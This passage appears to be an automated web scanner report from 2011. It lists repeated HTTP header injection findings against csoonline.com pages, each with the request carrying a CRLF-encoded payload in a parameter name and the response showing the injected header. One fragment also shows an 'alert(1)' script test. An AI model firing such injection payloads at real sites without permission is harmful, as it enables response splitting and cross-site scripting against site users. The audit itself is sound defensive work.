Cookie: regid=-105b800c:12e634a5162:-1251.90; Svr=svr.regwa2; __utma=192604602.318667683.1298902742.1298902742.1298902742.1; __utmb=192604602; __utmc=192604602; __utmz=192604602.1298902742.1.1.utmccn=(referral)|utmcsr=zones.computerworld.com|utmcct=/ncircle/registration.php|utmcmd=referral

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 28 Feb 2011 14:18:44 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=3a711
f5e77a50fc3
;alert(1)&Source_BC=&Script=/LP/c8ec899850f/reg&10/50552781/_from=cso
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 460

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

2.11. http://www.csoonline.com/article/486324 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /article/486324

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload a1f89%0d%0a768de21f1d5 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /article/486324?a1f89%0d%0a768de21f1d5=1 HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.1.10.1298897096; NSC_djp.dpn=44593ca03660; s_pers=%20s_pv%3DCSO%2520nCircle%2520Solution%2520Center%7C1298898968728%3B; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D43%3B%20SC_LINKS%3DCSO%2520nCircle%2520Solution%2520Center%255E%255ETools%2520%2526%2520Templates%255E%255ECSO%2520nCircle%2520Solution%2520Center%2520%257C%2520Tools%2520%2526%2520Templates%255E%255ENav%253AMain%3B%20s_sq%3Dcsoonlinecom%253D%252526pid%25253DCSO%25252520nCircle%25252520Solution%25252520Center%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.csoonline.com/article/486324%252526ot%25253DA%3B

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 12:46:15 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/article/486324/security-tools-templates-policies?a1f89
768de21f1d5
=1
Content-Length: 132
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:01:57 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/article/486324/security-tools-templates-policies?a1f89
768de21f1d5=1">here</a>

2.12. http://www.csoonline.com/webcast/603308/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /webcast/603308/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload c1609%0d%0aae951e02a5c was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /webcast/603308/?c1609%0d%0aae951e02a5c=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:27 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/webcast/603308/utility-mandate-software-security-for-the-smart-grid?c1609
ae951e02a5c
=1
Content-Length: 151
Keep-Alive: timeout=5, max=18
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:07 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/webcast/603308/utility-mandate-software-security-for-the-smart-grid?c1609
ae951e02a5c=1">here</a>

2.13. http://www.csoonline.com/webcast/626992/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /webcast/626992/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload b38a5%0d%0ab593df67fa6 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /webcast/626992/?b38a5%0d%0ab593df67fa6=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:28 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/webcast/626992/60-minutes-the-future-of-the-perimeter?b38a5
b593df67fa6
=1
Content-Length: 137
Keep-Alive: timeout=5, max=36
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:08 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/webcast/626992/60-minutes-the-future-of-the-perimeter?b38a5
b593df67fa6=1">here</a>

2.14. http://www.csoonline.com/webcast/636963/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /webcast/636963/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload ad048%0d%0ab80f3f9cfef was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /webcast/636963/?ad048%0d%0ab80f3f9cfef=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:24 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/webcast/636963/expert-webcast-defend-your-mobile-data?ad048
b80f3f9cfef
=1
Content-Length: 137
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:04 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/webcast/636963/expert-webcast-defend-your-mobile-data?ad048
b80f3f9cfef=1">here</a>

2.15. http://www.csoonline.com/webcast/646474/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /webcast/646474/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 58396%0d%0a94bbc6213b0 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /webcast/646474/?58396%0d%0a94bbc6213b0=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:24 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/webcast/646474/on-demand-webinar-2010-threat-report?58396
94bbc6213b0
=1
Content-Length: 135
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:04 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/webcast/646474/on-demand-webinar-2010-threat-report?58396
94bbc6213b0=1">here</a>

2.16. http://www.csoonline.com/webcast/647171/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /webcast/647171/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 1b429%0d%0a24c03876611 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /webcast/647171/?1b429%0d%0a24c03876611=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:24 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/webcast/647171/whose-data-is-it-anyway-?1b429
24c03876611
=1
Content-Length: 123
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:05 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/webcast/647171/whose-data-is-it-anyway-?1b429
24c03876611=1">here</a>

2.17. http://www.csoonline.com/webcast/647466/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /webcast/647466/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 4687f%0d%0a7d4e137520b was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /webcast/647466/?4687f%0d%0a7d4e137520b=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:24 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/webcast/647466/the-insider-threat-understand-and-mitigate-your-risks?4687f
7d4e137520b
=1
Content-Length: 152
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:05 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/webcast/647466/the-insider-threat-understand-and-mitigate-your-risks?4687f
7d4e137520b=1">here</a>

2.18. http://www.csoonline.com/webcast/653065/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /webcast/653065/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload d57a1%0d%0a0a7a5387037 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /webcast/653065/?d57a1%0d%0a0a7a5387037=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:23 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/webcast/653065/perspectives-on-pci-2.0-actionable-insights-for-your-compliance-program?d57a1
0a7a5387037
=1
Content-Length: 170
Keep-Alive: timeout=5, max=6
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:03 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/webcast/653065/perspectives-on-pci-2.0-actionable-insights-for-your-compliance-program?d57a1
0a7a5387037=1">here</a>

2.19. http://www.csoonline.com/webcast/660768/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /webcast/660768/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 395f6%0d%0a4e1529cea74 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /webcast/660768/?395f6%0d%0a4e1529cea74=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:21 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/webcast/660768/data-security-during-data-recovery?395f6
4e1529cea74
=1
Content-Length: 133
Keep-Alive: timeout=5, max=65
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:02 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/webcast/660768/data-security-during-data-recovery?395f6
4e1529cea74=1">here</a>

2.20. http://www.csoonline.com/webcast/661718/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /webcast/661718/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 3b141%0d%0a856b47c58ff was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /webcast/661718/?3b141%0d%0a856b47c58ff=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:17 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/webcast/661718/mcafee-network-security?3b141
856b47c58ff
=1
Content-Length: 122
Keep-Alive: timeout=5, max=6
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:50:58 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/webcast/661718/mcafee-network-security?3b141
856b47c58ff=1">here</a>

2.21. http://www.csoonline.com/webcast/663332/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /webcast/663332/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 41fe9%0d%0ad26cb1d8012 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /webcast/663332/?41fe9%0d%0ad26cb1d8012=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:16 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/webcast/663332/best-practices-for-tackling-security-early-in-development?41fe9
d26cb1d8012
=1
Content-Length: 156
Keep-Alive: timeout=5, max=49
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:50:57 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/webcast/663332/best-practices-for-tackling-security-early-in-development?41fe9
d26cb1d8012=1">here</a>

2.22. http://www.csoonline.com/webcast/666090/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /webcast/666090/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 67db0%0d%0a292c304d402 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /webcast/666090/?67db0%0d%0a292c304d402=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:16 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/webcast/666090/today-s-changing-security-threats-demand-the-zero-trust-model-a-niksun-webcast-featuring-independent-research-firm?67db0
292c304d402
=1
Content-Length: 213
Keep-Alive: timeout=5, max=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:50:56 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/webcast/666090/today-s-changing-security-threats-demand-the-zero-trust-model-a-niksun-webcast-featuring-independent-research-firm?67db0
292c304d402
...[SNIP]...

2.23. http://www.csoonline.com/white-paper/647166/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/647166/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload d8fc7%0d%0a469267247bc was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/647166/?d8fc7%0d%0a469267247bc=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:36:14 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/647166/email-protection-buyer-s-guide?d8fc7
469267247bc
=1
Content-Length: 133
Keep-Alive: timeout=5, max=57
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:55 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/647166/email-protection-buyer-s-guide?d8fc7
469267247bc=1">here</a>

2.24. http://www.csoonline.com/white-paper/647167/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/647167/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 420f7%0d%0a5445852b3e5 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/647167/?420f7%0d%0a5445852b3e5=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:36:18 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/647167/how-whole-disk-encryption-works?420f7
5445852b3e5
=1
Content-Length: 134
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:58 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/647167/how-whole-disk-encryption-works?420f7
5445852b3e5=1">here</a>

2.25. http://www.csoonline.com/white-paper/647168/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/647168/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 43080%0d%0a10013b322d was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/647168/?43080%0d%0a10013b322d=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:36:11 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/647168/anatomy-of-a-data-breach?43080
10013b322d
=1
Content-Length: 126
Keep-Alive: timeout=5, max=62
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:52 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/647168/anatomy-of-a-data-breach?43080
10013b322d=1">here</a>
